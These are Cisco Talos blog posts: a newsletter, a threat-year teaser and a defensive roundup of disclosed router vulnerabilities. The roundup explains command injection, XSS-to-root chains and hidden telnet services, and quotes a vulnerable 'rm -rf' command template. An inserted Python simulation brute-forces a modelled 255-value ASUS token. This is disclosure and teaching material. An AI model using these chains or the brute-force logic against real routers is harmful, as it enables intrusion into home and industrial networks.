Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62131 - 62143 and 300633 - 300638.

ClamAV detections are available for this threat:

Win.Ransomware.Hydracrypt-9878672-0

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

IOCs

Indicators of Compromise associated with this threat can be found here.

Previewing Talos at BlackHat 2023

3 August 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

The time has come once again for all of us (well, not me specifically but lots of other Talos people) to descend on Las Vegas for Hacker Summer Camp. Cisco Talos will be well-represented at BlackHat and DEF CON over the course of the next few weeks with a slew of presentations, demos and appearances to speak to the security community.

As always, we’ll be at the Cisco booth at BlackHat, located just north of the main entrance (it’s #1532 if you’re searching!). If you need help finding us, download the BlackHat app to see a map of the entire conference. Talos researchers will be at the booth throughout the conference to give lightning talks on a wide range of topics β€” everything from machine learning to the basics of spotting phishing emails. New talks will take place every other half hour starting at 10 a.m. local time on Wednesday.

We’ll also have a presence at the BlackHat Career Zone β€” diagonal from Startup City on the show floor at Kiosk #CZ2 β€” throughout the conference, where you can talk to us about current job openings, ask for advice on career advancement or just talk about future opportunities for how you could become part of our team. On Thursday, Aug. 10, from 10 a.m. - noon local time, we’ll have Talos hiring managers at the Cisco booth to also talk about potential job opportunities.

The highlight of BlackHat is our sponsored talk on Aug. 9 at 11:30 a.m. local time in Business Hall Theater A. Nick Biasini, our head of Outreach, joins Cisco’s Vice President of Product Management for Threat, Detection and Response A.J. Shipley to talk about Cisco XDR. Learn how the newest offering from Cisco Secure combines telemetry from multiple sources and applies analytics to uncover malicious activities and attacker tactics, techniques and procedures (TTPs).

The following week at DEF CON, Vitor Ventura and Asheer Malhotra will be at the Crypto and Privacy Village, delivering a talk on β€œMercenary” threat actors and the spyware they create on the Saturday of the conference at 6 p.m local time. Asheer and Vitor have written extensively about this topic and why the malware they’re creating and selling is potentially more dangerous than β€œtraditional” spyware.

Keep an eye out on our Twitter (or X, whatever we’re calling it) for more information about a live Beers with Talos podcast recording and other opportunities to ask our researchers questions.

If you're flying out to Vegas for either conference, make sure to bookmark our Half-Year in Review to read during your travels. This is a great overview of the top threats of 2023 so far this year and looks at where the cybersecurity landscape might head next.

The one big thing

Since the discovery of the high-profile VPNFilter malware in 2018, our vulnerability research team has had a renewed focus on small and home office (SOHO) wireless routers. These are devices that are present in almost every house and business in the modern world because they are necessary to deliver the internet to multiple devices everyone possesses and relies on today. Over the past four-plus years, Talos worked with multiple vendors to disclose and patch nearly 290 CVEs in a wide range of products and libraries these routers use. This week, we released a full rundown of all these vulnerabilities and what the major takeaways are for users and the manufacturers behind these products.

Why do I care?

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. Our reports to these vendors resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.

So now what?

The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable.

Top security headlines of the week

American military officials and cybersecurity experts are actively hunting for malware that is reportedly loaded onto systems belonging to major power and water suppliers and communications systems that service U.S. military bases. A new report from the New York Times states that the malware is a β€œticking time bomb” that could disrupt U.S. military operations in the event of a direct or indirect military conflict with China. Sources in the report indicated that the malware comes from a Chinese state-sponsored actor that may be working for the People’s Liberation Army. While the government is still actively hunting for the malicious code, it is apparently hidden deep within targeted networks and has taken months to find. Microsoft and the White House disclosed that Chinese state-sponsored actors accessed the emails of at least two dozen American organizations, including some federal government agencies. (The New York Times, CNN)

The effects of the MOVEit data breach continue to spread. Government contractor Maximus disclosed last week that, although its systems were not directly affected by the Clop ransomware gang’s attack on the MOVEit file transfer software, as many as 8 million to 11 million individuals’ personal information may have been compromised. The company said in a filing to the U.S. Securities and Exchange Commission that attackers may have accessed files that "contain personal information, including Social Security numbers, protected health information, and/or other personal information, of at least 8-to-11 million individuals.” Clop claims on its leak site that it stole 169 GB of data from Maximus. More than 200 organizations have reportedly been affected by the MOVEit breach. (TechCrunch, Dark Reading)

Russian state-sponsored actors are suspected to be behind a series of denial-of-service attacks against multiple Italian banks on Wednesday, leaving many consumers unable to access their accounts. Italy’s cybersecurity agency said at least five banks were affected, though they were able to restore services fairly quickly. The group NoName057(16) took credit for the attacks on its Telegram channels, accusing Italian government officials of being anti-Russian and supporting Ukraine. Security researchers said the DDoS attacks caused β€œshort-lived disruption with little to no wider consequence.” Actors with potential links to Russia have been behind several recent high-profile denial-of-service attacks, including against video game company Blizzard and Microsoft Outlook. (Reuters, The Record by Recorded Future)

Can’t get enough Talos?

Upcoming events where you can find Talos

BlackHat (Aug. 5 - 10)

Las Vegas, Nevada

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in β€œOne Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b
MD5: f5e908f1fac5f98ec63e3ec355ef6279
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::tpd

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c
MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

Half-Year in Review: Recapping the top threats and security trends so far in 2023

3 August 2023 at 12:00

From new ransomware groups, a growing mercenary space, espionage campaigns, supply chain attacks, and new β€œas a service” tools popping up, there's a lot to talk about already in the first half of 2023.

Here are the main threats we've covered on our blog up until the end of June 2023. The timeline is a blend of threat advisory articles, and long-term research that our analysts have been working on for a while.


Be sure to subscribe to blog.talosintelligence.com to get future blogs sent straight to your inbox. You can also follow our ongoing Vulnerability Roundup series, where we run down the latest vulnerabilities, attack scenarios, and coverage.

Threat trends

Many of the threats we've written about this year have involved extortion as part of the attackers’ plans. We've seen threat actors utilize every chance they get to steal sensitive data, to be used in future attacks and/or to manipulate victims into paying up before their data ends up on the dark web. Another growing trend is the mercenary landscape – β€œhackers for hire” growing their wares and increasingly commercializing tools, such as spyware.

The mercenary space is a topic we'll talk more about in the β€œ2023 Year in Review” which Cisco Talos researchers, detection specialists, linguists, threat hunters, incident responders, and analysts are now actively working on, and will be published later this year.

Last year’s inaugural report represented an unprecedented effort within Cisco to tell a comprehensive story of our work, relying on a wide variety of data and expertise. This year, we are bringing all these elements together again, to report on how the threat landscape has changed from 2022 and delve deep into some of the most notorious and impactful threats of 2023.

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

2 August 2023 at 12:00
  • Since the discovery of the widespread VPNFilter malware in 2018, Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.
  • During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.
  • Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.
  • There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.

Small office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices.

In 2018, Talos uncovered and published an article about the VPNFilter malware aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post discussing our concern about an increase in state-sponsored campaigns targeting network infrastructure; Microsoft discussed state-sponsored actors using SOHO routers to obfuscate their operations at CyberWarCon 2022; and Lumen recently highlighted that criminal actors are also targeting SOHO routers to support their operations.

The Talos Vulnerability Discovery and Research Team β€” our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware β€” made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors.

Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.

In this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole.

Routers

ASUS RT-AX82-U

Research conducted by Lilith Wyatt.

Background

Our researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the β€œIf This, Then That” (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.

Notable Vulnerabilities

  • TALOS-2022-1586: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated.
  • TALOS-2022-1590: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user.
  • TALOS-2022-1592: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.
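The lifetime and brute-force problems described for TALOS-2022-1586 come from two independent weaknesses: a token space of only 255 values, and a validity check computed from device uptime, which restarts from zero on reboot. The model below is an added example and not ASUS firmware code; the one-byte token, the two-minute window, the token surviving a reboot in NVRAM and the exact form of the age check are assumptions chosen to reproduce the behaviour the text describes. The hardened class shows the two fixes a practitioner would apply.

```python
"""Model of the IFTTT token flaw described for TALOS-2022-1586.

Added example, not ASUS code: the firmware is not shown in this post, so the
one-byte token space, the two-minute window and the uptime-based age check are
assumptions chosen to reproduce the behaviour the text describes.
"""
import hmac
import secrets

WINDOW_SECONDS = 120  # assumed intended token lifetime


class WeakTokenStore:
    """Vulnerable model: 255 possible tokens, age measured against uptime."""

    def __init__(self):
        self.uptime = 0            # seconds since boot, as the device would track it
        self.token = None          # assumed to persist in NVRAM across reboots
        self.created_uptime = None

    def tick(self, seconds):
        self.uptime += seconds

    def reboot(self):
        self.uptime = 0            # the only thing a reboot resets in this model

    def issue(self):
        self.token = secrets.randbelow(255) + 1   # values 1..255, as the text says
        self.created_uptime = self.uptime
        return self.token

    def check(self, candidate):
        if self.token is None:
            return False
        age = self.uptime - self.created_uptime   # goes negative after a reboot
        return age < WINDOW_SECONDS and candidate == self.token


def brute_force(store):
    """Exhaust the 255-value space; returns the accepted token or None."""
    for guess in range(1, 256):
        if store.check(guess):
            return guess
    return None


class HardenedTokenStore:
    """Fixed model: 128-bit token, bound to a boot identifier, constant-time compare."""

    def __init__(self):
        self.uptime = 0
        self.boot_id = secrets.token_hex(8)
        self.token = None
        self.created = None

    def tick(self, seconds):
        self.uptime += seconds

    def reboot(self):
        self.uptime = 0
        self.boot_id = secrets.token_hex(8)  # anything issued before the reboot is dead
        self.token = None

    def issue(self):
        self.token = secrets.token_hex(16)   # 2**128 values instead of 255
        self.created = (self.boot_id, self.uptime)
        return self.token

    def check(self, candidate):
        if self.token is None or not isinstance(candidate, str):
            return False
        boot_id, created_uptime = self.created
        if boot_id != self.boot_id:
            return False
        if not 0 <= self.uptime - created_uptime < WINDOW_SECONDS:
            return False
        return hmac.compare_digest(candidate, self.token)


def demo_weak():
    """Returns (expired_before_reboot, recovered_by_brute_force_after_reboot)."""
    store = WeakTokenStore()
    store.tick(3600)                # device has been up for an hour
    token = store.issue()
    store.tick(600)                 # ten minutes later: well past the window
    expired = store.check(token)    # False, as intended
    store.reboot()                  # uptime restarts at 0, token remains
    recovered = brute_force(store)  # accepted again until uptime catches up
    return expired, recovered == token


def demo_hardened():
    """Returns (expired_before_reboot, accepted_after_reboot, fresh_token_ok)."""
    store = HardenedTokenStore()
    store.tick(3600)
    token = store.issue()
    store.tick(600)
    expired = store.check(token)
    store.reboot()
    after_reboot = store.check(token)
    fresh = store.issue()
    store.tick(30)
    return expired, after_reboot, store.check(fresh)


if __name__ == "__main__":
    print("weak model (expired, recovered after reboot):", demo_weak())
    print("hardened model (expired, after reboot, fresh ok):", demo_hardened())
```

The point of binding the token to a boot identifier is that an uptime counter is not a clock: any check of the form `uptime - created < window` is satisfied by every token created before the last reboot. A wall-clock timestamp would also fail here if the device has no battery-backed RTC, which is why the hardened model invalidates tokens on boot rather than trusting any time source.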

Observations

The primary issue in the ASUS RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.

D-Link DIR-3040

Research conducted by Dave McDaniel.

Background

The D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 covered all aspects of the device in its stock configuration, including the web services (among them hidden diagnostic services), the Wi-Fi mesh networking implementation, and other general security issues. The Wi-Fi mesh networking implementation allows multiple routers to connect together to provide increased network coverage.

Notable Vulnerabilities

  • TALOS-2021-1284: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection.
  • TALOS-2021-1361: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered.
  • TALOS-2021-1281: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.

Observations

The DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.

InHand Network InRouter 302

Research conducted by Francesco Benvenuto.

Background

Our researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, Talos submitted 23 unique reports to InHand, resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 covered all aspects of the device in its stock configuration, including the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of the InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability will be discussed more in-depth in the Siretta router section.

Notable Vulnerabilities

  • TALOS-2022-1469: This vulnerability existed in the HTTP server, in the /info.jsp endpoint, which is normally only called by the router’s own web pages. The endpoint effectively evals a request parameter as JavaScript. Because access to the endpoint is not restricted, this yields a cross-site scripting (XSS) vulnerability.
  • TALOS-2022-1472: This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.
  • TALOS-2022-1476: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including factory, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.

Observations

These three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router’s configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution.

We wrote an extensive blog post that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.

Linksys E Series

Research conducted by a researcher within Cisco Talos.

Background

The Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.

Notable Vulnerability

  • TALOS-2018-0625: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device’s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`.

Milesight UR32L and MilesightVPN

Research conducted by Francesco Benvenuto.

Background

The Milesight UR32L is an industrial router that offers a good tradeoff between price and functionality. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, resulting in 63 CVEs. Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: the HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using MilesightVPN, so as to investigate a more complete attack scenario.

Notable Vulnerabilities

  • TALOS-2023-1701: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and gain access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.
  • TALOS-2023-1697: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.
  • TALOS-2023-1706: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these functions have an OS command injection vulnerability through the host parameter supplied to them. An attacker with low-privilege credentials on the UR32L could exploit these vulnerabilities and execute remote commands.

Observations

The vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight’s UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, an attacker can use TALOS-2023-1701 to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.

Netgear Orbi Router RBR750/RBS750

Research conducted by Dave McDaniel.

Background

The Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation for quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.

Notable Vulnerabilities

  • TALOS-2022-1595: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the br-lan interface of the device. The encryption used was a modified Blowfish algorithm similar to the one used for the Nintendo DS handheld video game system's cartridge copy protection. Once the packet was received, a telnet daemon was spawned which allowed direct access to the underlying BusyBox system.
  • TALOS-2022-1596: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.
  • TALOS-2022-1592: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized ubus, the open-source library developed by OpenWrt. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying BusyBox system.

Observations

The Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.

Robustel R1510

Research conducted by Francesco Benvenuto.

Background

The Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.

Notable Vulnerabilities

  • TALOS-2022-1577: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device.
  • TALOS-2022-1576: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in a system() function call. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process.
  • TALOS-2022-1578: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a sysprintf function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.

Observations

Most of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for the many instances of these checks across the device. Absent a specific performance requirement, these checks should occur multiple times throughout the process of uploading files and later utilizing those uploaded files. Using a common library to perform these checks would negate the risk of validation in one place falling out of sync with checks elsewhere in the system.

Sierra Wireless Airlink

Research conducted by Carl Hurd.

Background

Talos researchers chose to investigate the Sierra Wireless AirLink because of its deployment flexibility. The AirLink is intended for use in remote locations, utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.

Notable Vulnerabilities

  • TALOS-2018-0751: This vulnerability is contained within the ACEManager web server, which lacked a cross-site request forgery (CSRF) prevention header. Such headers allow the server to check that a request comes from the legitimate session in a coherent manner, rather than from a link in an unrelated browser context capitalizing on an already authenticated session. This vulnerability allows for the possibility of session hijacking using various methods.
  • TALOS-2018-0750: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user.
  • TALOS-2018-0748: Talos discovered this vulnerability within the template file upload capability of the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files already on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherited the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.

Observations

Most of the findings on the AirLink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allow authenticated requests to be made by hijacking a user's session. A well-developed and tested web server should include CSRF protection automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.

Siretta QUARTZ-GOLD

Research conducted by Francesco Benvenuto.

Background

The Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted 14 unique reports to Siretta, resulting in 62 CVEs. The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By building on this firmware, the QUARTZ-GOLD inherits any vulnerabilities in the reused code, just like the many other projects that utilize the open-source codebase.

Notable Vulnerabilities

  • TALOS-2022-1638: This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called β€œDELETE_FILE”, which would allow execution of the rm -rf <base_folder>/<M2M_data_entry.data> & command through the system function. The M2M_data_entry.data portion of the command was specified in the UDP packet without any parsing or sanitization on the M2M_data_entry.data string. This functionality was vulnerable to command injection. Furthermore, the DELETE_FILE functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.
  • TALOS-2022-1615: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.
